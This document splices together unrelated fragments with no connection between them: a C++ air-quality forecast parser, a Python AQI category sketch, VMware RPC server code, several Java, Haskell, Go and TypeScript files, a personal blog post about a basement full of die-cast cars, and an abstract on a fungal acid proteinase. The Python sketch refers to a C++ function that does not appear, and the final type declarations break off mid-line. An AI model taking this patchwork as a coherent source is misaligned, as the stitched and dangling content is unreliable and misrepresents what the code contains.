void Parser::ParseForecast(const String& xmlString) {
  TinyXML xml;
  xml.init((uint8_t*)g_xml_parse_buffer, sizeof(g_xml_parse_buffer),
           &XML_ForecastCallback);
  for (size_t i = 0; i < xmlString.length(); i++) {
    xml.processChar(xmlString[i]);
  }
}

// The forecast results may contain days in the past, so the actual alert
// day (today) may be somewhere in the middle of the forecast array. Find
// the matching day of week, and merge the values from the alert response
// into the corresponding forecast entry.
//
// static
void Parser::MergeAlert() {
  g_today_idx = -1;
  if (g_today.day_of_week == "")
    return;
  for (int i = 0; i < kMaxNumEntries; i++) {
    Status& forecast = Parser::forecast(i);
    if (g_today.day_of_week == forecast.day_of_week) {
      if (g_today.aqi_category != AQICategory::None)
        forecast.aqi_category = g_today.aqi_category;
      forecast.alert_status = g_today.alert_status;
      forecast.date_full = g_today.date_full;
      g_today_idx = i;
      return;
    }
  }
}

// static
const Status& Parser::status(int idx) {
  if (g_today_idx == -1)
    return idx == 0 ? g_today : g_empty_status;
  idx += g_today_idx;
  if (idx >= kMaxNumEntries)
    return g_empty_status;
  return g_forecasts[idx];
}

// static
Status& Parser::forecast(int idx) {
  return g_forecasts[idx];
}

// static
const Status& Parser::AlertStatus() {
  return g_today;
}

// static
void Parser::Reset() {
  g_parse_channel_item_idx = 0;
  g_today_idx = -1;
  g_today.Reset();
  for (int i = 0; i < kMaxNumEntries; i++)
    g_forecasts[i].Reset();
}

}  // namespace spare_the_air
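The thresholds in Parser::AQIValueToCategory follow the standard US EPA AQI category breakpoints. The same mapping can be sketched compactly as a table-driven lookup (the helper name aqi_category is ours; Python is used here for illustration):

```python
# Breakpoints mirror Parser::AQIValueToCategory: (upper bound, category name).
AQI_BREAKPOINTS = [
    (50, "Good"),
    (100, "Moderate"),
    (150, "Unhealthy for Sensitive Groups"),
    (200, "Unhealthy"),
    (300, "Very Unhealthy"),
]


def aqi_category(value):
    """Map a numeric AQI value to its EPA category name."""
    if value < 0:
        return "None"
    for upper, name in AQI_BREAKPOINTS:
        if value <= upper:
            return name
    # Anything above 300 is Hazardous.
    return "Hazardous"
```

Keeping the breakpoints in one ordered table makes the boundary values (50, 100, 150, 200, 300 are inclusive upper bounds) easy to audit against the C++ chain of comparisons.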
/*
 * Copyright (C) 2011 VMware, Inc. All rights reserved.
 *
 * Module   : service.c
 *
 * Abstract :
 *
 *            VMware Directory Service
 *
 *            Service
 *
 *            RPC common functions
 *
 */

#include "..\includes.h"

#ifdef _WIN32

#define END_POINT_BUF_LEN 128
#define HOST_NAME_LEN 256

// Security-callback function.
// TBD: Why is the following callback function NOT being called on
// Linux/Likewise env?
static RPC_STATUS CALLBACK
RpcIfCallbackFn(
    RPC_IF_HANDLE InterfaceUuid,
    PVOID Context
    )
{
    RPC_AUTHZ_HANDLE hPrivs;
    unsigned char* pszServerPrincName = NULL;
    DWORD dwAuthnLevel;
    DWORD dwAuthnSvc;
    DWORD dwAuthzSvc;
    RPC_STATUS rpcStatus = RPC_S_OK;

    VMCA_LOG_DEBUG("In RpcIfCallbackFn.\n");

    rpcStatus = RpcBindingInqAuthClient(
                    Context,
                    &hPrivs,
                    // The data referenced by this parameter is read-only,
                    // and therefore should not be modified/freed.
                    &pszServerPrincName,
                    &dwAuthnLevel,
                    &dwAuthnSvc,
                    &dwAuthzSvc);
    if (rpcStatus != RPC_S_OK)
    {
        VMCA_LOG_ERROR("RpcBindingInqAuthClient returned: 0x%x\n", rpcStatus);
        BAIL_ON_VMCA_ERROR(rpcStatus);
    }

    VMCA_LOG_DEBUG("Authentication Level = %d, Authentication Service = %d,"
                   "Authorization Service = %d.\n",
                   dwAuthnLevel, dwAuthnSvc, dwAuthzSvc);

    // Now check the authentication level. We require at least packet-level
    // authentication.
    if (dwAuthnLevel < RPC_C_AUTHN_LEVEL_PKT)
    {
        VMCA_LOG_ERROR("Attempt by client to use weak authentication.\n");
        rpcStatus = ERROR_ACCESS_DENIED;
        BAIL_ON_VMCA_ERROR(rpcStatus);
    }

    return 0;

error:

    if (pszServerPrincName != NULL)
    {
        RpcStringFree(&pszServerPrincName);
    }
    return 0;
}

static DWORD
VMCARegisterRpcServerIf(
    VMCA_IF_HANDLE_T hInterfaceSpec
    )
{
    DWORD dwError = 0;

    dwError = RpcServerRegisterIfEx(
                  hInterfaceSpec,
                  NULL,
                  NULL,
                  RPC_IF_ALLOW_SECURE_ONLY,
                  RPC_C_LISTEN_MAX_CALLS_DEFAULT,
                  RpcIfCallbackFn);
    BAIL_ON_VMCA_ERROR(dwError);

error:
    return dwError;
}

static DWORD
VMCABindServer(
    VMCA_RPC_BINDING_VECTOR_P_T* pServerBinding,
    RPC_IF_HANDLE ifSpec,
    PVMCA_ENDPOINT pEndPoints,
    DWORD dwCount
    )
{
    DWORD dwError = 0;
    DWORD i;

    /*
     * Prepare the server binding handle.
     * Use all available protocols (UDP and TCP). This basically allocates
     * new sockets for us and associates the interface UUID and
     * object UUID with those communications endpoints.
     */
    for (i = 0; i < dwCount; i++)
    {
        if (!pEndPoints[i].endpoint)
        {
            RpcTryExcept
            {
                dwError = RpcServerUseProtseq(
                              (unsigned char*)pEndPoints[i].protocol,
                              RPC_C_PROTSEQ_MAX_REQS_DEFAULT,
                              NULL);
            }
            RpcExcept(RpcExceptionCode())
            {
                dwError = RpcExceptionCode();
            }
            RpcEndExcept;
            BAIL_ON_VMCA_ERROR(dwError);
        }
        else
        {
            RpcTryExcept
            {
                dwError = RpcServerUseProtseqEp(
                              (unsigned char*)pEndPoints[i].protocol,
                              RPC_C_PROTSEQ_MAX_REQS_DEFAULT,
                              (unsigned char*)pEndPoints[i].endpoint,
                              NULL);
            }
            RpcExcept(RpcExceptionCode())
            {
                dwError = RpcExceptionCode();
            }
            RpcEndExcept;
            BAIL_ON_VMCA_ERROR(dwError);
        }
    }

    RpcTryExcept
    {
        dwError = RpcServerInqBindings(pServerBinding);
    }
    RpcExcept(RpcExceptionCode())
    {
        dwError = RpcExceptionCode();
    }
    RpcEndExcept;
    BAIL_ON_VMCA_ERROR(dwError);

error:
    return dwError;
}

static DWORD
VMCAFreeBindingVector(
    VMCA_RPC_BINDING_VECTOR_P_T pServerBinding
    )
{
    DWORD dwError = 0;

    RpcTryExcept
    {
        dwError = RpcBindingVectorFree(&pServerBinding);
    }
    RpcExcept(RpcExceptionCode())
    {
        dwError = RpcExceptionCode();
    }
    RpcEndExcept;
    BAIL_ON_VMCA_ERROR(dwError);

error:
    return dwError;
}

static DWORD
VMCAEpRegister(
    VMCA_RPC_BINDING_VECTOR_P_T pServerBinding,
    VMCA_IF_HANDLE_T pInterfaceSpec,
    PCSTR pszAnnotation  // "VMCAService Service"
    )
{
    DWORD dwError = 0;

    RpcTryExcept
    {
        dwError = RpcEpRegisterA(
                      pInterfaceSpec,
                      pServerBinding,
                      NULL,
                      (RPC_CSTR)pszAnnotation);
    }
    RpcExcept(RpcExceptionCode())
    {
        dwError = RpcExceptionCode();
    }
    RpcEndExcept;
    BAIL_ON_VMCA_ERROR(dwError);

error:
    return dwError;
}

static DWORD
VMCARegisterAuthInfo(
    VOID
    )
{
    DWORD dwError = 0;

    RpcTryExcept
    {
        dwError = RpcServerRegisterAuthInfoA(
                      NULL,                       // Server principal name
                      RPC_C_AUTHN_GSS_NEGOTIATE,  // Authentication service
                      NULL,                       // Use default key function
                      NULL);
    }
    RpcExcept(RpcExceptionCode())
    {
        dwError = RpcExceptionCode();
    }
    RpcEndExcept;
    BAIL_ON_VMCA_ERROR(dwError);

error:
    return dwError;
}

DWORD
VMCAStartRpcServer()
{
    DWORD dwError = 0;
    char npEndpointBuf[END_POINT_BUF_LEN] = {VMCA_NCALRPC_END_POINT};
#ifndef _WIN32
    VMCA_ENDPOINT endpoints[] = {
        {"ncalrpc", NULL}
    };
#else
    VMCA_ENDPOINT endpoints[] = {
        {"ncalrpc", VMCA_NCALRPC_END_POINT}
    };
#endif
    DWORD dwEpCount = sizeof(endpoints) / sizeof(endpoints[0]);
    VMCA_RPC_BINDING_VECTOR_P_T pServerBinding = NULL;

    endpoints[0].endpoint = npEndpointBuf;

    // Register RPC server.
    dwError = VMCARegisterRpcServerIf(vmca_v1_0_s_ifspec);
    BAIL_ON_VMCA_ERROR(dwError);
    VMCA_LOG_INFO("VMCAService Service registered successfully.");

    // Bind RPC server.
    dwError = VMCABindServer(
                  &pServerBinding,
                  vmca_v1_0_s_ifspec,
                  endpoints,
                  dwEpCount);
    BAIL_ON_VMCA_ERROR(dwError);
    VMCA_LOG_INFO("VMCAService Service bound successfully.");

    // The RpcEpRegister function adds or replaces entries in the local host's
    // endpoint-map database. For an existing database entry that matches the
    // provided interface specification, binding handle, and object UUID,
    // this function replaces the entry's endpoint with the endpoint in the
    // provided binding handle.
    dwError = VMCAEpRegister(pServerBinding, vmca_v1_0_s_ifspec, "VMCAService Service");
    BAIL_ON_VMCA_ERROR(dwError);
    VMCA_LOG_INFO("RPC Endpoints registered successfully.");

    // Free the binding vector to avoid a resource leak.
    dwError = VMCAFreeBindingVector(pServerBinding);
    BAIL_ON_VMCA_ERROR(dwError);
    VMCA_LOG_INFO("RPC free vector binding successfully.");

    // A server application calls RpcServerRegisterAuthInfo to register an
    // authentication service to use for authenticating remote procedure
    // calls. A server calls this routine once for each authentication
    // service the server wants to register. If the server calls this
    // function more than once for a given authentication service, the
    // results are undefined.
    // dwError = VMCARegisterAuthInfo();
    // BAIL_ON_VMCA_ERROR(dwError);

    VMCA_LOG_INFO("VMCAService Service is listening on local named-pipe port on [%s]\n",
                  endpoints[0].endpoint);

error:
    return dwError;
}

PVOID
VMCAListenRpcServer(
    PVOID pInfo
    )
{
    DWORD dwError = 0;
    unsigned int cMinCalls = 1;
    unsigned int fDontWait = TRUE;
    PVMAFD_HB_HANDLE pHandle = NULL;

    dwError = VMCAHeartbeatInit(&pHandle);
    BAIL_ON_VMCA_ERROR(dwError);

    RpcTryExcept
    {
        dwError = RpcServerListen(
                      cMinCalls,
                      RPC_C_LISTEN_MAX_CALLS_DEFAULT,
                      fDontWait);
    }
    RpcExcept(RpcExceptionCode())
    {
        dwError = RpcExceptionCode();
    }
    RpcEndExcept;
    BAIL_ON_VMCA_ERROR(dwError);

cleanup:
    if (pHandle)
    {
        VMCAStopHeartbeat(pHandle);
    }
    VMCA_LOG_INFO("VMCAListenRpcServer is exiting\n");
    return NULL;

error:
    VMCA_LOG_ERROR("VMCAListenRpcServer failed [%d]\n", dwError);
    goto cleanup;
}

DWORD
VMCAStopRpcServer(
    VOID
    )
{
    DWORD dwError = 0;

    RpcTryExcept
    {
        /* MSDN: If the server is not listening, the function fails. */
        dwError = RpcMgmtStopServerListening(NULL);
        if (dwError == NO_ERROR)
        {
            // If we successfully called RpcMgmtStopServerListening,
            // wait for RPC calls to complete.
            dwError = RpcMgmtWaitServerListen();
        }
    }
    RpcExcept(RpcExceptionCode())
    {
        dwError = RpcExceptionCode();
    }
    RpcEndExcept;

    return dwError;
}

#endif // _WIN32
/**
 * class Teacher extends Profession.
 *
 * @author Ruzhev Alexander
 * @since 29.03.2017
 */
public class Teacher extends Profession {
    /**
     * Constructor extends Profession.
     *
     * @param name - name
     * @param age - age
     * @param employed - date employed
     * @param profession - profession teacher
     */
    public Teacher(String name, int age, Date employed, String profession) {
        super(name, age, employed, profession);
    }

    /**
     * teach the student.
     *
     * @param student - object Engineer
     */
    public void teach(Engineer student) {
        System.out.printf("Teacher %s teaches engineer %s", this.getName(), student.getName());
    }

    /**
     * teach the student.
     *
     * @param student - object MedicalDoctor
     */
    public void teach(MedicalDoctor student) {
        System.out.printf("Teacher %s teaches medical doctor %s", this.getName(), student.getName());
    }

    /**
     * test job.
     */
    public void testJob() {
        System.out.printf("Teacher %s checks the work of the group", this.getName());
    }

    /**
     * give homework.
     */
    public void toGiveHomework() {
        System.out.printf("Teacher %s gives homework to the group", this.getName());
    }
}
Hi there! C'mon in. You've been invited to take a tour through my top-secret hideout filled with automotive memorabilia. Take a few moments and look around. There is much to see. I've been collecting all things automotive since I was a kid. I had always dreamed about creating a small retreat for myself where I could go and enjoy all of my automotive treasures, but I never really had space to display them all. In 1998 we finally purchased a house with a basement big enough to create my vision. The previous owner had started a basement remodel but lost interest in the project. Because the basement was not all finished, it allowed me to move some walls around and really make it what I wanted. I've always admired 1940s-style gas station architecture and 1950s-style diners, so I used those as my inspiration for designing the space. Over the course of 10 months, about 500 sq. ft. of space was transformed into a display/rec room, a workshop, and a playroom for our kids. All the construction work was done by myself, including laying the carpet and tile and building the bar. The bar is built from glass block and Corian®. I also constructed an entertainment center from some leftover materials I had from the bar. On display is my 1500+ die-cast car collection of varying scales, model cars, automotive artwork, and racing memorabilia. Also, in the photos you'll notice the '90 1.6 Miata motor. I got the motor as a freebie from a friend who had to buy a replacement motor for his Miata. I brought it home, painted it, and made the display base for it. Also pictured are my original Hot Wheels Redlines and Flying Colors, Matchbox, and Corgis from when I was a kid. I went pretty easy on them, so most have survived in near-mint condition. I also have over 500 packaged cars above in custom-made racks I designed. I made the racks so that the packages could easily slide in and out.
You will also see the models I have built over the past twenty years and numerous 1/24-scale die-cast and plastic promo cars I've collected. Also below is a picture of a driver's suit and crew uniform. The uniforms are from the MOMO Ferrari 333sp / Doran racing team. This driver's suit was worn at the 1998 Rolex 24 Hours race, which the MOMO team won. The suit is autographed by Max Papis (one of the four drivers to compete in that car) and was given to me by the Doran team in appreciation for the paint scheme design I did for them. The two end tables made from the custom wheels have two purposes: first, they look cool in the basement, and second, it's a convenient way to store my MINI's summer wheels during the winter months. The center table is made from a real Indy car rain tire that I got from a friend. The last photos show my workshop. A little messy, but functional. I own about 500 or so kits that should keep me busy in my retirement years. Also I have a pretty decent research library, including a near-complete Scale Auto Enthusiast collection and Hot Rod magazines back to the '70s. Well, that's it. Thanks for stopping by!!!
module Main where

import RAM
import Instruction
import RawInstruction
import qualified Version1 as V1
import qualified Version2 as V2
import System.Environment
import Types
import qualified System.IO.Strict as S

main :: IO ()
main = do
  -----------------------------------------------
  -- For building an executable file, enable this
  args <- getArgs
  rawInstructions <- readData (args !! 0)
  version <- return (args !! 1)
  debug <- if length args == 3
             then return Development
             else return Production
  -- For running from the "stack ghci" command, enable this
  -- putStr "File: "
  -- file <- getLine
  -- rawInstructions <- readData $ "/src/" ++ file
  -- putStr "Version: "
  -- version <- getLine
  -- putStr "Debug: "
  -- debug <- fmap (\lst -> if length lst == 0 then Production else Development) getLine
  -----------------------------------------------
  ram <- return startingRAM
  results <- case version of
    "1" -> return $ V1.loadInstructions debug ram rawInstructions
    "2" -> return $ V2.loadInstructions debug ram rawInstructions
    other -> error "invalid version"
  print $! results -- fmap (take 200) $
/**
 * Load language settings for workspace.
 */
public static void loadLanguageSettingsWorkspace() {
    try {
        Job.getJobManager().join(JOB_FAMILY_SERIALIZE_LANGUAGE_SETTINGS_WORKSPACE, null);
    } catch (OperationCanceledException e) {
        return;
    } catch (InterruptedException e) {
        CCorePlugin.log(e);
        Thread.currentThread().interrupt();
    }

    List<ILanguageSettingsProvider> providers = null;

    URI uriStoreWsp = getStoreInWorkspaceArea(STORAGE_WORKSPACE_LANGUAGE_SETTINGS);
    Document doc = null;
    try {
        serializingLockWsp.acquire();
        doc = XmlUtil.loadXml(uriStoreWsp);
    } catch (Exception e) {
        CCorePlugin.log("Can't load preferences from file " + uriStoreWsp, e);
    } finally {
        serializingLockWsp.release();
    }

    if (doc != null) {
        Element rootElement = doc.getDocumentElement();
        NodeList providerNodes = rootElement.getElementsByTagName(ELEM_PROVIDER);

        List<String> userDefinedProvidersIds = new ArrayList<String>(providerNodes.getLength());
        providers = new ArrayList<ILanguageSettingsProvider>(providerNodes.getLength());
        for (int i = 0; i < providerNodes.getLength(); i++) {
            Node providerNode = providerNodes.item(i);
            final String providerId = XmlUtil.determineAttributeValue(providerNode, ATTR_ID);
            if (userDefinedProvidersIds.contains(providerId)) {
                String msg = "Ignored an attempt to persist duplicate language settings provider, id=" + providerId;
                CCorePlugin.log(new Status(IStatus.WARNING, CCorePlugin.PLUGIN_ID, msg, new Exception()));
                continue;
            }
            userDefinedProvidersIds.add(providerId);

            ILanguageSettingsProvider provider = null;
            try {
                provider = loadProvider(providerNode);
            } catch (Exception e) {
                CCorePlugin.log("Error initializing workspace language settings providers", e);
            }
            if (provider == null) {
                provider = new NotAccessibleProvider(providerId);
            }
            providers.add(provider);
        }
    }

    setWorkspaceProvidersInternal(providers);
}
package decorator

import (
	"bytes"
	"fmt"
	"path/filepath"
	"testing"

	"github.com/dave/dst"
	"github.com/dave/dst/decorator/resolver/guess"
	"github.com/dave/dst/dstutil"
)

func TestApply(t *testing.T) {
	testPackageRestoresCorrectlyWithApplyClone(
		t,
		"github.com/dave/dst/gendst/data",
		"fmt",
		"bytes",
		"io",
	)
}

func testPackageRestoresCorrectlyWithApplyClone(t *testing.T, path ...string) {
	t.Helper()
	pkgs, err := Load(nil, path...)
	if err != nil {
		t.Fatal(err)
	}
	for _, p := range pkgs {
		t.Run(p.PkgPath, func(t *testing.T) {
			r := NewRestorer()
			r.Path = p.PkgPath
			r.Resolver = &guess.RestorerResolver{}
			for _, file := range p.Syntax {
				fpath := p.Decorator.Filenames[file]
				_, fname := filepath.Split(fpath)
				t.Run(fname, func(t *testing.T) {

					cloned1 := dst.Clone(file).(*dst.File)
					cloned2 := dst.Clone(file).(*dst.File)

					cloned1 = dstutil.Apply(cloned1, func(c *dstutil.Cursor) bool {
						switch n := c.Node().(type) {
						case *dst.Ident:
							n1 := dst.Clone(c.Node())
							n1.Decorations().End.Replace(fmt.Sprintf("/* %s */", n.Name))
							c.Replace(n1)
						}
						return true
					}, nil).(*dst.File)

					// same with dst.Inspect
					dst.Inspect(cloned2, func(n dst.Node) bool {
						switch n := n.(type) {
						case *dst.Ident:
							n.Decorations().End.Replace(fmt.Sprintf("/* %s */", n.Name))
						}
						return true
					})

					buf1 := &bytes.Buffer{}
					if err := r.Fprint(buf1, cloned1); err != nil {
						t.Fatal(err)
					}

					buf2 := &bytes.Buffer{}
					if err := r.Fprint(buf2, cloned2); err != nil {
						t.Fatal(err)
					}

					if buf1.String() != buf2.String() {
						t.Errorf("diff:\n%s", diff(buf2.String(), buf1.String()))
					}
				})
			}
		})
	}
}
Purification and Characterization of an Extracellular Acid Proteinase from the Ectomycorrhizal Fungus Hebeloma crustuliniforme

Hebeloma crustuliniforme produced an extracellular acid proteinase in a liquid medium containing bovine serum albumin as the sole nitrogen source. The proteinase was purified 26-fold with 20% activity recovery and was shown to have a molecular weight of 37,800 (by sodium dodecyl sulfate-polyacrylamide gel electrophoresis) and an isoelectric point of 4.8 ± 0.2. The enzyme was most active at 50°C and pH 2.5 against bovine serum albumin and was stable in the absence of substrates at temperatures up to 45°C and pH values between 2.0 and 5.0. Pepstatin A, diazoacetyl-dl-norleucine methyl ester, the metal ions Fe2+ and Fe3+, and phenolic acids severely inhibited enzyme activity, while antipain, leupeptin, N-α-p-tosyl-l-lysine chloromethyl ketone, and trypsin inhibitor inhibited it moderately. The proteinase hydrolyzed bovine serum albumin and cytochrome c rapidly compared with casein and azocasein but failed to hydrolyze any of the low-molecular-weight peptide derivatives tested.
import {Observe} from '@rxstack/async-event-dispatcher';
import {ServerConfigurationEvent, ServerEvents, ConnectionEvent} from '@rxstack/core';
import {Injectable, Injector} from 'injection-js';
import {socketMiddleware} from './socketio.middleware';
import {SocketioServer} from '../../src/socketio.server';
import {EventEmitter} from 'events';

@Injectable()
export class MockEventListener {
  connectedUsers: EventEmitter[] = [];
  private injector: Injector;

  setInjector(injector: Injector): void {
    this.injector = injector;
  }

  @Observe(ServerEvents.CONFIGURE)
  async onConfigure(event: ServerConfigurationEvent): Promise<void> {
    if (event.server.getName() !== SocketioServer.serverName) {
      return;
    }
    event.server.getEngine().use(socketMiddleware(this.injector));
  }

  @Observe(ServerEvents.CONNECTED)
  async onConnect(event: ConnectionEvent): Promise<void> {
    if (event.server.getName() !== SocketioServer.serverName) {
      return;
    }
    this.connectedUsers.push(event.connection);
    event.server.getEngine().emit('hi', 'all');
  }

  @Observe(ServerEvents.DISCONNECTED)
  async onDisconnect(event: ConnectionEvent): Promise<void> {
    if (event.server.getName() !== SocketioServer.serverName) {
      return;
    }
    const idx = this.connectedUsers.findIndex((current) => current === event.connection);
    if (idx !== -1) {
      this.connectedUsers.splice(idx, 1);
    }
  }
}
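The bookkeeping MockEventListener does for `connectedUsers` — push on connect, `findIndex` plus `splice` on disconnect — can be isolated as a small sketch. The class name below is hypothetical, not part of rxstack:

```typescript
// Minimal sketch of the connection bookkeeping above (hypothetical name).
class ConnectionTracker<T> {
  readonly connected: T[] = [];

  onConnect(conn: T): void {
    this.connected.push(conn);
  }

  onDisconnect(conn: T): void {
    // Identity comparison, as in the listener's findIndex callback.
    const idx = this.connected.findIndex((current) => current === conn);
    if (idx !== -1) {
      this.connected.splice(idx, 1);
    }
  }
}
```

Disconnecting an unknown connection is a no-op, matching the `idx !== -1` guard in the original.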
/**
 * Gck 1
 *
 * Generated from 1.0.0
 */
import * as GObject from "@gi-types/gobject";
import * as Gio from "@gi-types/gio";
import * as GLib from "@gi-types/glib";

export const INVALID: number;
export const MAJOR_VERSION: number;
export const MICRO_VERSION: number;
export const MINOR_VERSION: number;
export const URI_FOR_MODULE_WITH_VERSION: number;
export const URI_FOR_OBJECT_ON_TOKEN: number;
export const URI_FOR_OBJECT_ON_TOKEN_AND_MODULE: number;
export const VENDOR_CODE: number;

export function builder_unref(builder?: any | null): void;
export function error_get_quark(): GLib.Quark;
export function list_get_boxed_type(): GObject.GType;
export function message_from_rv(rv: number): string;
export function modules_enumerate_objects(
    modules: Module[],
    attrs: Attributes,
    session_options: SessionOptions
): Enumerator;
export function modules_enumerate_uri(modules: Module[], uri: string, session_options: SessionOptions): Enumerator;
export function modules_get_slots(modules: Module[], token_present: boolean): Slot[];
export function modules_initialize_registered(cancellable?: Gio.Cancellable | null): Module[];
export function modules_initialize_registered_async(cancellable?: Gio.Cancellable | null): Promise<Module[]>;
export function modules_initialize_registered_async(
    cancellable: Gio.Cancellable | null,
    callback: Gio.AsyncReadyCallback<Gio.Cancellable | null> | null
): void;
export function modules_initialize_registered_async(
    cancellable?: Gio.Cancellable | null,
    callback?: Gio.AsyncReadyCallback<Gio.Cancellable | null> | null
): Promise<Module[]> | void;
export function modules_initialize_registered_finish(result: Gio.AsyncResult): Module[];
export function modules_object_for_uri(modules: Module[], uri: string, session_options: SessionOptions): Object | null;
export function modules_objects_for_uri(modules: Module[], uri: string, session_options: SessionOptions): Object[];
export function modules_token_for_uri(modules: Module[], uri: string): Slot;
export
function modules_tokens_for_uri(modules: Module[], uri: string): Slot[]; export function objects_from_handle_array(session: Session, object_handles: number[]): Object[]; export function slots_enumerate_objects(slots: Slot[], match: Attributes, options: SessionOptions): Enumerator; export function uri_build(uri_data: UriData, flags: UriFlags): string; export function uri_error_get_quark(): GLib.Quark; export function uri_parse(string: string, flags: UriFlags): UriData; export function value_to_boolean(value: Uint8Array | string, result: boolean): boolean; export function value_to_ulong(value: Uint8Array | string, result: number): boolean; export type Allocator = (data: any | null, length: number) => any | null; export namespace BuilderFlags { export const $gtype: GObject.GType<BuilderFlags>; } export enum BuilderFlags { NONE = 0, SECURE_MEMORY = 1, } export namespace Error { export const $gtype: GObject.GType<Error>; } export enum Error { PROBLEM = -951891199, } export namespace UriError { export const $gtype: GObject.GType<UriError>; } export enum UriError { BAD_SCHEME = 1, BAD_ENCODING = 2, BAD_SYNTAX = 3, BAD_VERSION = 4, NOT_FOUND = 5, } export namespace SessionOptions { export const $gtype: GObject.GType<SessionOptions>; } export enum SessionOptions { READ_ONLY = 0, READ_WRITE = 2, LOGIN_USER = 4, AUTHENTICATE = 8, } export namespace UriFlags { export const $gtype: GObject.GType<UriFlags>; } export enum UriFlags { FOR_OBJECT = 2, FOR_TOKEN = 4, FOR_MODULE = 8, WITH_VERSION = 16, FOR_ANY = 65535, } export module Enumerator { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; chained: Enumerator; interaction: Gio.TlsInteraction; } } export class Enumerator extends GObject.Object { static $gtype: GObject.GType<Enumerator>; constructor(properties?: Partial<Enumerator.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Enumerator.ConstructorProperties>, ...args: any[]): void; // Properties 
chained: Enumerator; interaction: Gio.TlsInteraction; // Members get_chained(): Enumerator | null; get_interaction(): Gio.TlsInteraction | null; get_object_type(): GObject.GType; next(cancellable?: Gio.Cancellable | null): Object | null; next_async(max_objects: number, cancellable?: Gio.Cancellable | null): Promise<Object[]>; next_async( max_objects: number, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; next_async( max_objects: number, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object[]> | void; next_finish(result: Gio.AsyncResult): Object[]; next_n(max_objects: number, cancellable?: Gio.Cancellable | null): Object[]; set_chained(chained?: Enumerator | null): void; set_interaction(interaction?: Gio.TlsInteraction | null): void; set_object_type(object_type: GObject.GType, attr_types: number[]): void; } export module Module { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; functions: any; path: string; } } export class Module extends GObject.Object { static $gtype: GObject.GType<Module>; constructor(properties?: Partial<Module.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Module.ConstructorProperties>, ...args: any[]): void; // Properties functions: any; path: string; // Signals connect(id: string, callback: (...args: any[]) => any): number; connect_after(id: string, callback: (...args: any[]) => any): number; emit(id: string, ...args: any[]): void; connect( signal: "authenticate-object", callback: (_source: this, object: Object, label: string, password: any | null) => boolean ): number; connect_after( signal: "authenticate-object", callback: (_source: this, object: Object, label: string, password: any | null) => boolean ): number; emit(signal: "authenticate-object", object: Object, label: string, password: any | null): void; connect( signal: "authenticate-slot", callback: (_source: this, 
slot: Slot, string: string, password: any | null) => boolean ): number; connect_after( signal: "authenticate-slot", callback: (_source: this, slot: Slot, string: string, password: any | null) => boolean ): number; emit(signal: "authenticate-slot", slot: Slot, string: string, password: any | null): void; // Members equal(module2: Module): boolean; get_info(): ModuleInfo; get_path(): string; get_slots(token_present: boolean): Slot[]; hash(): number; match(uri: UriData): boolean; vfunc_authenticate_object(object: Object, label: string, password: string): boolean; vfunc_authenticate_slot(slot: Slot, label: string, password: string): boolean; static initialize(path: string, cancellable?: Gio.Cancellable | null): Module; static initialize_async(path: string, cancellable?: Gio.Cancellable | null): Promise<Module | null>; static initialize_async( path: string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<Module> | null ): void; static initialize_async( path: string, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<Module> | null ): Promise<Module | null> | void; static initialize_finish(result: Gio.AsyncResult): Module | null; } export module Object { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; handle: number; module: Module; session: Session; } } export class Object extends GObject.Object { static $gtype: GObject.GType<Object>; constructor(properties?: Partial<Object.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Object.ConstructorProperties>, ...args: any[]): void; // Properties handle: number; module: Module; session: Session; // Members cache_lookup(attr_types: number[], cancellable?: Gio.Cancellable | null): Attributes; cache_lookup_async(attr_types: number[], cancellable?: Gio.Cancellable | null): Promise<Attributes>; cache_lookup_async( attr_types: number[], cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | 
null ): void; cache_lookup_async( attr_types: number[], cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Attributes> | void; cache_lookup_finish(result: Gio.AsyncResult): Attributes; destroy(cancellable?: Gio.Cancellable | null): boolean; destroy_async(cancellable?: Gio.Cancellable | null): Promise<boolean>; destroy_async(cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null): void; destroy_async( cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; destroy_finish(result: Gio.AsyncResult): boolean; equal(object2: Object): boolean; get_async(attr_types: number[], cancellable?: Gio.Cancellable | null): Promise<Attributes>; get_async( attr_types: number[], cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; get_async( attr_types: number[], cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Attributes> | void; get_data(attr_type: number, cancellable?: Gio.Cancellable | null): Uint8Array; get_data(...args: never[]): never; get_data_async(attr_type: number, allocator: Allocator, cancellable?: Gio.Cancellable | null): Promise<Uint8Array>; get_data_async( attr_type: number, allocator: Allocator, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; get_data_async( attr_type: number, allocator: Allocator, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; get_data_finish(result: Gio.AsyncResult): Uint8Array; get_finish(result: Gio.AsyncResult): Attributes; get_full(attr_types: number[], cancellable?: Gio.Cancellable | null): Attributes; get_handle(): number; get_module(): Module; get_session(): Session; get_template(attr_type: number, cancellable?: Gio.Cancellable | null): Attributes; get_template_async(attr_type: number, cancellable?: Gio.Cancellable | 
